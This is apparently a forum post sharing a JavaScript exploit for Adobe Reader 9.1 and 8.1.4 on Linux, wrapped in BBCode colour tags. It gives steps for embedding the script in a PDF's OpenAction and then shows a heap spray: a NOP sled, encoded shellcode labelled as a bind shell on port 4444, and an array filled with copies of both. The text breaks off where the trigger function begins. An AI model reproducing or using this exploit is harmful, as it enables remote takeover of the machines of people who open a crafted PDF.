Kod:
[COLOR=#000000][COLOR=#FF8000]//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//
//Steps:
//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)
//- attach the following script to the OpenAction of the pdf.
//##############
[/COLOR][COLOR=#007700]var [/COLOR][COLOR=#0000BB]memory[/COLOR][COLOR=#007700];
function [/COLOR][COLOR=#0000BB]New_Script[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#FF8000]//if(adobe9)//adobe reader 8 works also with app.setTimeOut?
[/COLOR][COLOR=#007700]var [/COLOR][COLOR=#0000BB]startwith [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]app[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]alert[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Hi'[/COLOR][COLOR=#007700]);[/COLOR][COLOR=#FF8000]//required for adobe9
[/COLOR][COLOR=#007700]var [/COLOR][COLOR=#0000BB]nop [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]unescape[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"%u9090%u9090"[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#FF8000]//long nop will also force the address to go to 0x90909090 so 2 steps in one ;)
[/COLOR][COLOR=#007700]var [/COLOR][COLOR=#0000BB]shellcode [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]unescape[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#DD0000]"%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#FF8000]//linux bind shell at port 4444
[/COLOR][COLOR=#007700]while([/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]length [/COLOR][COLOR=#007700]<= [/COLOR][COLOR=#0000BB]0x100000[/COLOR][COLOR=#007700]/[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]) [/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700]+=[/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]substring[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]0x100000[/COLOR][COLOR=#007700]/[/COLOR][COLOR=#0000BB]2 [/COLOR][COLOR=#007700]- [/COLOR][COLOR=#0000BB]shellcode[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]length[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]memory[/COLOR][COLOR=#007700]=new Array();
for([/COLOR][COLOR=#0000BB]i[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];[/COLOR][COLOR=#0000BB]i[/COLOR][COLOR=#007700]<[/COLOR][COLOR=#0000BB]0x6ff[/COLOR][COLOR=#007700];[/COLOR][COLOR=#0000BB]i[/COLOR][COLOR=#007700]++) [/COLOR][COLOR=#FF8000]//we should at least overwrite 0x90909090
[/COLOR][COLOR=#007700]{[/COLOR][COLOR=#0000BB]memory[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]i[/COLOR][COLOR=#007700]]=[/COLOR][COLOR=#0000BB]nop [/COLOR][COLOR=#007700]+ [/COLOR][COLOR=#0000BB]shellcode[/COLOR][COLOR=#007700];}
[/COLOR][COLOR=#FF8000]//start exploit now
[/COLOR][COLOR=#0000BB]start[/COLOR][COLOR=#007700]();
function [/COLOR][COLOR=#0000BB]start[/COLOR][COLOR=#007700]()[/COLOR][/COLOR]
